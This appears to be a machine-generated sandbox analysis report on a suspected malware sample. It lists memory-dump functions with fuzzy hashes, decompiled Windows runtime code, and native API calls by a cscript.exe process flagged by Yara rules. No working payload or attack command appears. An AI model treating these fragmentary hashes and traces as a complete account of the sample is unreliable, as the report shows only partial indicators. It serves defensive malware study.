                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                • Instruction ID: 132b0d601a71d10a716f18a264073c9a53b44a0d0611fc4986d0fba1789b3c06
                                                • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                • Instruction Fuzzy Hash: CBC08C701811805AEB2B570CCE20B393A50BB0C688F4801ACAB510D4E2D368B802C248
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01607D50, Relevance: .0, Instructions: 7COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                • Instruction ID: 295bea7b5fdf6bbcc5c21f55791a50f360158a2ee8f33a502d0670d33fe544b7
                                                • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                • Instruction Fuzzy Hash: 12B092363019408FCE1BDF18C480B1633E4FB44A40B8400D0E400CBA61D329E9008900
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01612ACB, Relevance: .0, Instructions: 5COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                • Instruction ID: 7565109c5e8f9fe6d09973d3c517f6ce5302818a7767c785cb9df65ba8c14329
                                                • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                • Instruction Fuzzy Hash: B6B01232C10446CFCF02EF40C610B197332FB40750F06489491016B930C228AC01CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629560, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9ae13c2cdeb59693260b3392a61fd3fabe3309f4d5ed470ebd3888d235842faf
                                                • Instruction ID: d94025046fe3bf7a7be9781fe8354c29b2ac091c67d73c974d004e28f66b7f40
                                                • Opcode Fuzzy Hash: 9ae13c2cdeb59693260b3392a61fd3fabe3309f4d5ed470ebd3888d235842faf
                                                • Instruction Fuzzy Hash: F4900265231000020145A9990A0550B0449B7D63923D1D015F1406590CC66188756361
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629950, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c4d8cc0360c463c3dd6a163f43124fbd453d43d0b05c90d1fabf289f2720834c
                                                • Instruction ID: de387e3a2cc3c0b3c3030570d09a5d511909be62d70e4782e94877789371340f
                                                • Opcode Fuzzy Hash: c4d8cc0360c463c3dd6a163f43124fbd453d43d0b05c90d1fabf289f2720834c
                                                • Instruction Fuzzy Hash: 2E9002A121140403D14069994C056070009A7D0343F91D011A2054555ECA698C617175
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629520, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4b54a594d28a34e1ca3147aba0a581defe6a3a553e6c3b99d41d75663eb8f996
                                                • Instruction ID: 178ffdcbe8c6126279143bbfdaf3a3d4428d2a04184ed24dc7ad3ae40840f9a0
                                                • Opcode Fuzzy Hash: 4b54a594d28a34e1ca3147aba0a581defe6a3a553e6c3b99d41d75663eb8f996
                                                • Instruction Fuzzy Hash: CC9002E1211140924500A6998805B0B4509A7E0242B91D016E1044560CC5658861A175
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0162AD30, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 53abf5d015c1b99dc0edac15456cc85a860009cdeade316c7f279c7b3b5ed4de
                                                • Instruction ID: e6cc3b8b62a9d0fb46f7babc796914c38dcf81769875136a6b68142a3d920485
                                                • Opcode Fuzzy Hash: 53abf5d015c1b99dc0edac15456cc85a860009cdeade316c7f279c7b3b5ed4de
                                                • Instruction Fuzzy Hash: 82900271A1500012914075994C15647400AB7E0782B95D011A0504554CC9948A6563E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016295F0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 438478cf48d3ae0107c6bfaed36be11350572f9bff52ab48a6505fa30fde3582
                                                • Instruction ID: 9bc83323534c843fc8f35c30ff137b54f397ca575778c530ca612dc67bf47ad1
                                                • Opcode Fuzzy Hash: 438478cf48d3ae0107c6bfaed36be11350572f9bff52ab48a6505fa30fde3582
                                                • Instruction Fuzzy Hash: 8890027121100802D10465994C056870009A7D0342F91D011A6014655ED6A588A17171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016299D0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 07ee49ff439b0af88afcfe403291c830335be8a032e56654cbf16c54ebbc7bbe
                                                • Instruction ID: 16a9973feef8e0454db5f8d98dad0547749c21ba1ac01b7ca24319ba0fb25d14
                                                • Opcode Fuzzy Hash: 07ee49ff439b0af88afcfe403291c830335be8a032e56654cbf16c54ebbc7bbe
                                                • Instruction Fuzzy Hash: 679002A122100042D104659948057070049A7E1242F91D012A2144554CC5698C716165
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0162B040, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 947a9c78144917c0ef1e0e82b6b3a8272cfff80d83e420db4a871ee0e0815025
                                                • Instruction ID: 97fb63c6515c49ccaa05c09d34351968f8d672dae95e472e41ebfc295e77fafb
                                                • Opcode Fuzzy Hash: 947a9c78144917c0ef1e0e82b6b3a8272cfff80d83e420db4a871ee0e0815025
                                                • Instruction Fuzzy Hash: 179002A1611140434540B5994C054075019B7E13423D1D121A0444560CC6A88865A2A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629820, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9c43edea6f1dbc1534efa4de37dc0bac300f109b069204d3e66a278373179ee9
                                                • Instruction ID: 2c5ecd5b561018248de0a114d76701fa0bf24237787feac5d1ab7ea7cbe59d2d
                                                • Opcode Fuzzy Hash: 9c43edea6f1dbc1534efa4de37dc0bac300f109b069204d3e66a278373179ee9
                                                • Instruction Fuzzy Hash: 1390027125100402D14175994805607000DB7D0282FD1D012A0414554EC6958A66BAA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016298A0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6d6726f11b1e7f5a1dd9679e01ec6002962f8247ad38311a638b217135dadd8d
                                                • Instruction ID: 473a76d2cb4e0d4763cf6d629cf8f053c36b1d73c309e7c13531ae9f4d24eb61
                                                • Opcode Fuzzy Hash: 6d6726f11b1e7f5a1dd9679e01ec6002962f8247ad38311a638b217135dadd8d
                                                • Instruction Fuzzy Hash: 1590026131100402D10265994815607000DE7D1386FD1D012E1414555DC6658963B172
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629760, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8d5fb9f602e99afbea377a47fc16912cac58216037820373f22f92565366a739
                                                • Instruction ID: 0b3f63cbcccb95feb955e62fe83383fc670b9c662407cb49fd162d03d6f60599
                                                • Opcode Fuzzy Hash: 8d5fb9f602e99afbea377a47fc16912cac58216037820373f22f92565366a739
                                                • Instruction Fuzzy Hash: FA90027121100403D100659959097070009A7D0242F91E411A0414558DD69688617161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629770, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 670131419187e97e75a89f4d8b3dc695c0005725f53c840aa197f1433132df6a
                                                • Instruction ID: 8c55553bbe260aef2d8f9d75988c92b251cfa0d1832c1121ea2397de8d51db1a
                                                • Opcode Fuzzy Hash: 670131419187e97e75a89f4d8b3dc695c0005725f53c840aa197f1433132df6a
                                                • Instruction Fuzzy Hash: 9890026121504442D10069995809A070009A7D0246F91E011A1054595DC6758861B171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0162A770, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 51a58d25487632b52929f8403388a9a98e6151eb9d6dd7df973dabf54a047c02
                                                • Instruction ID: 7025316e59f2a5c1199574e6a1deaa6f2d5fa953e327e84418f185dc062e007e
                                                • Opcode Fuzzy Hash: 51a58d25487632b52929f8403388a9a98e6151eb9d6dd7df973dabf54a047c02
                                                • Instruction Fuzzy Hash: B490027521504442D50069995C05A870009A7D0346F91E411A041459CDC6948871B161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629730, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 83fef0fce0d2334bbdb769b960e560fc8c064c3a885f7e5df14e795ad328ec9a
                                                • Instruction ID: ee991f4317abb924908744fb758eebcb4d7d101983d6ac04c39ab599b7c6c38b
                                                • Opcode Fuzzy Hash: 83fef0fce0d2334bbdb769b960e560fc8c064c3a885f7e5df14e795ad328ec9a
                                                • Instruction Fuzzy Hash: 4690026161500402D140759958197070019A7D0242F91E011A0014554DC6998A6576E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629B00, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cff23b03add5651f0b0c3040cfbd2dfdf74407481a3907be2c44d0c5f4e51580
                                                • Instruction ID: 456f3350484ef19861df2662780269119387317753f9d9a0ff859fc1bd9bd90c
                                                • Opcode Fuzzy Hash: cff23b03add5651f0b0c3040cfbd2dfdf74407481a3907be2c44d0c5f4e51580
                                                • Instruction Fuzzy Hash: C190026125100802D14075998815707000AE7D0642F91D011A0014554DC656897576F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0162A710, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 10e68d7a8a1a410ed2b6216f9d2ada5b23a65357df6481ce99b51e2168b2eaab
                                                • Instruction ID: dc1cef64333a49622b499194e94d4a3eb6a2ed480e10056cde325fa1c33d594d
                                                • Opcode Fuzzy Hash: 10e68d7a8a1a410ed2b6216f9d2ada5b23a65357df6481ce99b51e2168b2eaab
                                                • Instruction Fuzzy Hash: A4900271311000529500AAD95C05A4B4109A7F0342B91E015A4004554CC59488716161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629FE0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8369ccd9985714e1c4dc8bc6d5a1e8c9984d668810c00d4edfe5821fd27b6090
                                                • Instruction ID: ea414585d7c10f7862b72343e5febf9b885a2d86cf028f0d9c4b9e1d99a2b2d5
                                                • Opcode Fuzzy Hash: 8369ccd9985714e1c4dc8bc6d5a1e8c9984d668810c00d4edfe5821fd27b6090
                                                • Instruction Fuzzy Hash: 0390027132114402D110659988057070009A7D1242F91D411A0814558DC6D588A17162
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0162A3B0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f64e5e30ef5652b9bc5c5938db83cfd01162ec55a7df6978141f756a7a235506
                                                • Instruction ID: 10e9c3fae299062061684be440f88425dd550c0b195140aa70ee1d9ec38ef220
                                                • Opcode Fuzzy Hash: f64e5e30ef5652b9bc5c5938db83cfd01162ec55a7df6978141f756a7a235506
                                                • Instruction Fuzzy Hash: 3B90027121144002D1407599884560B5009B7E0342F91D411E0415554CC6558866A261
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629650, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4552ae55a9a2f80e9d2610e3f3c4cf63875cf958372e7da18bc5c42168d0eabd
                                                • Instruction ID: 41b874ebe7d5def71d8021511d9ef6756e57a77d89cb090737f3af24336476b4
                                                • Opcode Fuzzy Hash: 4552ae55a9a2f80e9d2610e3f3c4cf63875cf958372e7da18bc5c42168d0eabd
                                                • Instruction Fuzzy Hash: 4E90027121504842D14075994805A470019A7D0346F91D011A0054694DD6658D65B6A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629A10, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a1b8359eca7b5c76cc9e5782d260cee1eff5607f66d585fa77a577b48b0fcb15
                                                • Instruction ID: 236fb15f91c7e9cb75090e7c520ddcb1722f874ad1c14b071038a400b4196dd8
                                                • Opcode Fuzzy Hash: a1b8359eca7b5c76cc9e5782d260cee1eff5607f66d585fa77a577b48b0fcb15
                                                • Instruction Fuzzy Hash: 7690027121140402D10065994C097470009A7D0343F91D011A5154555EC6A5C8A17571
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629610, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 28122b1f0ca0896a9fd580700a5849a6fd2800c3f97debfd0596f4d111c03645
                                                • Instruction ID: 8392d29cc7c1be4742fb2f5d9abed2b4565ce4f2822e33c8380caa9d651ba2db
                                                • Opcode Fuzzy Hash: 28122b1f0ca0896a9fd580700a5849a6fd2800c3f97debfd0596f4d111c03645
                                                • Instruction Fuzzy Hash: 6790027161500802D150759948157470009A7D0342F91D011A0014654DC7958A6576E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016296D0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 67fc2de22321cd42643f75af9e174e33a558d0254841bfe109f92a0e36fbb321
                                                • Instruction ID: 0b024f9be3c56336e56a8e7599f82478eb5dd57f26979d873084dc2bbf388fc7
                                                • Opcode Fuzzy Hash: 67fc2de22321cd42643f75af9e174e33a558d0254841bfe109f92a0e36fbb321
                                                • Instruction Fuzzy Hash: A790027121100842D10065994805B470009A7E0342F91D016A0114654DC655C8617561
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629A80, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eb065ff8ea1c6883391fb4c49c41a1fae2cef5d794e53475a1fa0a04e573eb77
                                                • Instruction ID: 3386bc019e551dad54f0b5943929364336cc906ad3dd643e730d4053231c4b28
                                                • Opcode Fuzzy Hash: eb065ff8ea1c6883391fb4c49c41a1fae2cef5d794e53475a1fa0a04e573eb77
                                                • Instruction Fuzzy Hash: 7F90026121144442D14066994C05B0F4109A7E1243FD1D019A4146554CC95588656761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629670, Relevance: .0, Instructions: 2COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction ID: 4999c653315c198b6d398a642745e25efe1179146cfb596987748f7bf348b2bf
                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction Fuzzy Hash:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0167FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 53%
                                                			E0167FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0162CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01675720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01675720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                0x0167fdda
                                                0x0167fde2
                                                0x0167fde5
                                                0x0167fdec
                                                0x0167fdfa
                                                0x0167fdff
                                                0x0167fe0a
                                                0x0167fe0f
                                                0x0167fe17
                                                0x0167fe1e
                                                0x0167fe19
                                                0x0167fe19
                                                0x0167fe19
                                                0x0167fe20
                                                0x0167fe21
                                                0x0167fe22
                                                0x0167fe25
                                                0x0167fe40

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0167FDFA
                                                Strings
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0167FE01
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0167FE2B
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                • API String ID: 885266447-3903918235
                                                • Opcode ID: e955c36b2cab655744592292165d54813c4aaf57e6da307a4f11e6841a3ba4fd
                                                • Instruction ID: 85cd353987be4ac49de6544a20e200f59e5a51698fbad29f1b9e77357521f8ac
                                                • Opcode Fuzzy Hash: e955c36b2cab655744592292165d54813c4aaf57e6da307a4f11e6841a3ba4fd
                                                • Instruction Fuzzy Hash: 95F0F632200602BFE6205A59DC02F33BF6BEB44B30F140358F6285A1E1DA62F86097F5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: cscript.exe PID: 4716 Parent PID: 3352 cscript.exeCOMMON

                                                Executed Functions

                                                Function 029AA360, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,029A4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,029A4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 029AA3AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction ID: 73125a5a15cfeea4a69d11cfefad7193b9004b3ebfb39d2d4889dde37fa4781b
                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction Fuzzy Hash: D8F0BDB2200208AFCB48CF88DC94EEB77ADAF8C754F158248BA0D97240C630E811CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029AA35A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,029A4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,029A4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 029AA3AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                • Opcode ID: a480d55fbac36759cc906c85554ce17f8e96a6ee1a9322715e9f337facaa4ea0
                                                • Instruction ID: bc79b25932c42973f05fb4a91a4562b4a540c2c51c1edc5531d731e2522ac9c8
                                                • Opcode Fuzzy Hash: a480d55fbac36759cc906c85554ce17f8e96a6ee1a9322715e9f337facaa4ea0
                                                • Instruction Fuzzy Hash: E5F019B2214188ABCB08CF98D894CEB77A9EF8C314B14864DF94D93202C234E855CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029AA410, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtReadFile.NTDLL(029A4D72,5EB65239,FFFFFFFF,029A4A31,?,?,029A4D72,?,029A4A31,FFFFFFFF,5EB65239,029A4D72,?,00000000), ref: 029AA455
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction ID: 87dc70044f89abcb06181cba6a129922d8a665b127a262649c54d4534e7700cc
                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction Fuzzy Hash: C9F0B7B2200208AFCB18DF89DC90EEB77ADEF8C754F158258BE1D97241D630E811CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029AA53A, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02992D11,00002000,00003000,00000004), ref: 029AA579
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: d4f4be829f66d1f65292dd75c1e124295ade1c12cfa36e25916f437572ce4cfe
                                                • Instruction ID: 5628954d3f416bd4c0fbac0eb2fdb14e86e536cf4e793fc6a7c39b1eed80f582
                                                • Opcode Fuzzy Hash: d4f4be829f66d1f65292dd75c1e124295ade1c12cfa36e25916f437572ce4cfe
                                                • Instruction Fuzzy Hash: D5F01CB6200148AFCB14DF98CC90EE777A9EF88354F158549FE5897245C630E811CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029AA540, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02992D11,00002000,00003000,00000004), ref: 029AA579
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                • Instruction ID: 87bcd424e3fc7dc55b390ad716696ebf1eddf5e6749fcee54c4b6a87f4385e1f
                                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                • Instruction Fuzzy Hash: 25F015B2200208AFCB18DF89CC80EAB77ADEF88754F118158BE0897241C630F810CBE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029AA490, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtClose.NTDLL(029A4D50,?,?,029A4D50,00000000,FFFFFFFF), ref: 029AA4B5
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
